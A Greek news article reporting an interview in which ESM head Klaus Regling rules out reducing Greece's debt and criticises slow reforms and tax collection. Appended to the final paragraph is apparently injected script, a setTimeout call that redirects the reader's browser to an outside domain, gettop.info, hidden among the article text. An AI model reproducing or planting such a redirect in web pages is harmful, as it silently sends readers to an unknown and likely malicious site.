Ρέγκλινγκ: Αποκλείεται η μείωση του ελληνικού χρέους

0
7

 

Μια ελάφρυνση του χρέους δεν συμπεριλαμβάνεται στις επιλογές που βρίσκονται στο τραπέζι μιας και οι Ευρωπαίοι εταίροι το αποκλείουν, όπως τονίζει ο επικεφαλής του Ευρωπαϊκού Μηχανισμού Σταθερότητας (ΕΜΣ), Κλάους Ρέγκλινγκ, σε συνέντευξή του στην αυστριακή Der Standard.

Ο κ. Ρέγκλινγκ σε δηλώσεις του απέκλεισε μείωση του χρέους ακόμη και αν αυτό ζητηθεί από την ελληνική πλευρά, τονίζοντας ότι αν κριθεί απαραίτητο θα υπάρξει νέα βελτίωση στους όρους δανεισμού, όπως για παράδειγμα με επέκταση του χρόνου ωρίμασης.

Ερωτηθείς αν η Ελλάδα θα χρειαστεί ελάφρυνση του χρέους της, ο επικεφαλής του ΕΜΣ τόνισε πως η χώρα το 2012 έχει λάβει τη μεγαλύτερη ελάφρυνση χρέους, καθώς ο ιδιωτικός τομέας διέγραψε χρέος 100 δισ. ευρώ ενώ συμπλήρωσε ότι προς ώρας η Ελλάδα δεν αντιμετωπίζει προβλήματα στην εξυπηρέτηση του χρέους της.

«Όταν λήξει το πρόγραμμα τον Αύγουστο του 2018, τότε θα υπάρξει μια ανάλυση για τη βιωσιμότητα του. Αν υπάρξουν ανάγκες, τότε θα δράσουμε», δήλωσε.

Επιπλέον, αρνήθηκε ότι υπάρχει διάσταση απόψεων με το ΔΝΤ στο εν λόγω ζήτημα, αναφέροντας ότι «η διαφορά με το ΔΝΤ είναι ότι το Ταμείο θα ήθελε τώρα μια απόφαση για το χρέος. Όμως το ΔΝΤ δεν ζητά «κούρεμα» του χρέους».

Σχετικά με την εφαρμογή του προγράμματος, ο κ. Ρέγκλινγ θεωρεί ότι γίνεται με αργό ρυθμό και συχνές καθυστερήσεις. Ωστόσο, σημειώνει, αν η Ελλάδα προχωρήσει στις μεταρρυθμίσεις, η χώρα έχει καλές πιθανότητες να βγει από την κρίση. Παρ’ όλα αυτά, αναφέρει ότι πρέπει να γίνουν περαιτέρω βελτιώσεις σε κάποιους τομείς, καθώς και ρυθμίσεις σε θέματα που αφορούν τους προϋπολογισμούς.

Ο κ. Ρέγκλινγκ άσκησε κριτική στην κυβέρνηση θεωρώντας πως η αδυναμία του κράτους να συγκεντρώνει τους φόρους είναι μια από τις αιτίες που οδήγησαν στο τρίτο πρόγραμμα.

«Οι άλλες χώρες που δέχθηκαν την αρωγή του ΕΜΣ – Η Ιρλανδία, η Πορτογαλία, η Ισπανία και η Κύπρος – όλες χρειάστηκαν μόνο ένα πρόγραμμα για να σταθούν στα πόδια τους. Ένας από τους λόγου είναι ότι εφάρμοσαν καλύτερα το πρόγραμμα. Υπάρχει πρόοδος με την ελληνική κυβέρνηση, αλλά δεν περιμένουμε θαύματα, καθώς αυτά τα ζητήματα χρειάζονται τουλάχιστον μια γενιά», τόνισε.

Ο κ. Κλάους Ρέγκλινγκ εξέφρασε την πεποίθηση πως η Ελλάδα από οικονομικής άποψης γυρίζει στο 2014 τότε που υπήρξε ανάπτυξη και μείωση της ανεργίας κατά 2%. «Εκείνη την περίοδο η Ελλάδα μπόρεσε να εκδώσει ομόλογα. Αυτά ήταν σημεία βελτίωσης», αναφέρει.

Ωστόσο, η κατάσταση επιδεινώθηκε εκ νέου το πρώτο εξάμηνο του 2015 με την ανάληψη της ηγεσίας από την κυβέρνηση ΣΥΡΙΖΑ, ενώ ο κ. Ρέγκλινγκ θεωρεί πως υπήρξαν πολλά πισωγυρίσματα όσον αφορά στις μεταρρυθμίσεις που τελικά οδήγησαν τη χώρα εκ νέου σε ύφεση. «Όλα αυτά οδήγησαν την Ελλάδα σε ένα τρίτο πρόγραμμα. Τώρα βρισκόμαστε για δεύτερη φορά σε αυτό το σημείο. Αν η Ελλάδα είχε μείνει τότε στον δρόμο των μεταρρυθμίσεων, θα είχαμε γλυτώσει πολύ χρήμα και χρόνο», τόνισε χαρακτηριστικά. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here